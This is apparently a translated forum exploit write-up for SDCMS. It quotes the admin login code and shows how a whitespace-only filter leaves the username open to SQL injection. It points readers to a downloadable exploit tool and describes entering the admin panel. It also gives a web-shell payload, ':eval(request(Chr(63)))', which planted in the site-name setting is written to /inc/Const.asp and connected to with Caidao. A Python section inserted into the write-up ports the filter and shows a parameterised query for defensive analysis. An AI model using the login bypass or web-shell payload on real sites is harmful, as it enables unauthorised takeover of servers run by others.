Author: T00LS 鬼哥
Vulnerable file: <admin directory>/index.asp
Sub Check
    Dim username,password,code,getcode,Rs
    IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
    username=FilterText(Trim(Request.Form("username")),1)
    password=FilterText(Trim(Request.Form("password")),1)
    code=Trim(Request.Form("yzm"))
    getcode=Session("SDCMSCode")
    IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
    IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)":died
    IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)":died
    IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)":died
    IF username="" or password="" Then
        Echo "用户名或密码不能为空":died
    Else
        'username is concatenated straight into the SQL string after FilterText mode 1
        Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
        IF Rs.Eof Then
            AddLog username,GetIp,"登录失败",1
            Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
        Else
            Add_Cookies "sdcms_id",Rs(0)
            Add_Cookies "sdcms_name",username
            Add_Cookies "sdcms_pwd",Rs(2)
            Add_Cookies "sdcms_admin",Rs(3)
            Add_Cookies "sdcms_alllever",Rs(4)
            Add_Cookies "sdcms_infolever",Rs(5)
            Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
            AddLog username,GetIp,"登录成功",1
            'Automatically delete log records older than 30 days
            IF Sdcms_DataType Then
                Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
            Else
                Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
            End IF
            Go("sdcms_index.asp")
        End IF
        Rs.Close
        Set Rs=Nothing
    End IF
End Sub
We can see that username is filtered through FilterText. Let's look at the code of FilterText:
Function FilterText(ByVal t0,ByVal t1)
    IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
    t0=Trim(t0)
    Select Case t1
        Case "1"
            'mode 1: only whitespace characters are removed
            t0=Replace(t0,Chr(32),"")
            t0=Replace(t0,Chr(13),"")
            t0=Replace(t0,Chr(10)&Chr(10),"")
            t0=Replace(t0,Chr(10),"")
        Case "2"
            'mode 2: control characters and ASCII punctuation are removed
            t0=Replace(t0,Chr(8),"")'backspace
            t0=Replace(t0,Chr(9),"")'tab (horizontal tab)
            t0=Replace(t0,Chr(10),"")'line feed
            t0=Replace(t0,Chr(11),"")'vertical tab
            t0=Replace(t0,Chr(12),"")'form feed
            t0=Replace(t0,Chr(13),"")'carriage return; chr(13)&chr(10) is the CR+LF combination
            t0=Replace(t0,Chr(22),"")'SYN control character
            t0=Replace(t0,Chr(32),"")'space
            t0=Replace(t0,Chr(33),"")'!
            t0=Replace(t0,Chr(34),"")'"
            t0=Replace(t0,Chr(35),"")'#
            t0=Replace(t0,Chr(36),"")'$
            t0=Replace(t0,Chr(37),"")'%
            t0=Replace(t0,Chr(38),"")'&
            t0=Replace(t0,Chr(39),"")''
            t0=Replace(t0,Chr(40),"")'(
            t0=Replace(t0,Chr(41),"")')
            t0=Replace(t0,Chr(42),"")'*
            t0=Replace(t0,Chr(43),"")'+
            t0=Replace(t0,Chr(44),"")',
            t0=Replace(t0,Chr(45),"")'-
            t0=Replace(t0,Chr(46),"")'.
            t0=Replace(t0,Chr(47),"")'/
            t0=Replace(t0,Chr(58),"")':
            t0=Replace(t0,Chr(59),"")';
            t0=Replace(t0,Chr(60),"")'<
            t0=Replace(t0,Chr(61),"")'=
            t0=Replace(t0,Chr(62),"")'>
            t0=Replace(t0,Chr(63),"")'?
            t0=Replace(t0,Chr(64),"")'@
            t0=Replace(t0,Chr(91),"")'[
            t0=Replace(t0,Chr(92),"")'\
            t0=Replace(t0,Chr(93),"")']
            t0=Replace(t0,Chr(94),"")'^
            t0=Replace(t0,Chr(95),"")'_
            t0=Replace(t0,Chr(96),"")'`
            t0=Replace(t0,Chr(123),"")'{
            t0=Replace(t0,Chr(124),"")'|
            t0=Replace(t0,Chr(125),"")'}
            t0=Replace(t0,Chr(126),"")'~
        Case Else
            'any other mode: HTML-encode the characters that matter for output
            t0=Replace(t0, "&", "&amp;")
            t0=Replace(t0, "'", "&#39;")
            t0=Replace(t0, """", "&quot;")
            t0=Replace(t0, "<", "&lt;")
            t0=Replace(t0, ">", "&gt;")
    End Select
    IF Instr(Lcase(t0),"expression")>0 Then
        'insert a soft hyphen entity to neutralise the CSS expression() keyword
        t0=Replace(t0,"expression","e&#173;xpression", 1, -1, 0)
    End If
    FilterText=t0
End Function
See? With parameter 1 it only filters:

    t0=Replace(t0,Chr(32),"")
    t0=Replace(t0,Chr(13),"")
    t0=Replace(t0,Chr(10)&Chr(10),"")
    t0=Replace(t0,Chr(10),"")
The vulnerability lets you obtain the admin account and password directly. The default SDCMS admin path is /admin/; if the site owner changed the admin path, look it up yourself!
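To make the mode 1 point checkable, here is an added Python port of the two FilterText modes and a parameterised version of the Sd_Admin lookup; it is analysis code written for this write-up, not SDCMS's own, and the table schema, sample admin row and helper names are constructed stand-ins.

```python
import hashlib
import sqlite3

# Constructed port of the character list from FilterText mode "2" above.
MODE2_CODES = ([8, 9, 10, 11, 12, 13, 22, 32] + list(range(33, 48))
               + list(range(58, 65)) + list(range(91, 97)) + list(range(123, 127)))


def filter_text(t0, t1):
    """Mirror FilterText: mode 1 strips only space/CR/LF, mode 2 strips ASCII punctuation too."""
    if not t0:
        return ""
    t0 = t0.strip(" ")                      # VBScript Trim removes spaces only
    if t1 == "1":
        for seq in (" ", "\r", "\n\n", "\n"):
            t0 = t0.replace(seq, "")
    elif t1 == "2":
        for code in MODE2_CODES:
            t0 = t0.replace(chr(code), "")
    return t0


def surviving_sql_metachars(value, mode):
    """Which SQL-significant characters still reach the query after filtering in `mode`."""
    return sorted(set(filter_text(value, mode)) & set("'\";-#/*=()"))


def lookup_admin(conn, username, password):
    """Parameterised replacement for the concatenated Sd_Admin query (assumed schema)."""
    pwd_hash = hashlib.md5(password.encode("utf-8")).hexdigest()
    return conn.execute(
        "SELECT Id, Sdcms_Name FROM Sd_Admin WHERE Sdcms_Name=? AND Sdcms_Pwd=?",
        (filter_text(username, "1"), pwd_hash),   # input is bound as data, never spliced in
    ).fetchone()


def make_db():
    """Constructed in-memory stand-in for Sd_Admin with one sample admin row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Sd_Admin (Id INTEGER PRIMARY KEY, Sdcms_Name TEXT, Sdcms_Pwd TEXT)")
    conn.execute("INSERT INTO Sd_Admin VALUES (1, 'admin', ?)",
                 (hashlib.md5(b"s3cret").hexdigest(),))
    return conn


if __name__ == "__main__":
    print("mode 1 leaves:", surviving_sql_metachars("o'brien (admin)", "1"))
    print("mode 2 leaves:", surviving_sql_metachars("o'brien (admin)", "2"))
    conn = make_db()
    print(lookup_admin(conn, "admin", "s3cret"), lookup_admin(conn, "o'brien", "x"))
```

The quote in a name like o'brien survives mode 1 untouched, which is exactly why concatenating it into the WHERE clause is unsafe; the bound parameter makes the same input match nothing.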
Exploit tool download (this tool only runs on XP): sdcms-EXP
Test:

Now enter the captcha shown in the tool, then click OK.

See, we went straight into the admin management interface, heh!

And just like that we are in the admin panel....
SDCMS privilege escalation:
Method 1: visit /<admin directory>/sdcms_set.asp and append “:eval(request(Chr(63)))’ after the site name field; that is enough to write a one-liner shell directly. It gets written to /inc/Const.asp, and the one-liner's connection password is ?

OK, now connect with Caidao!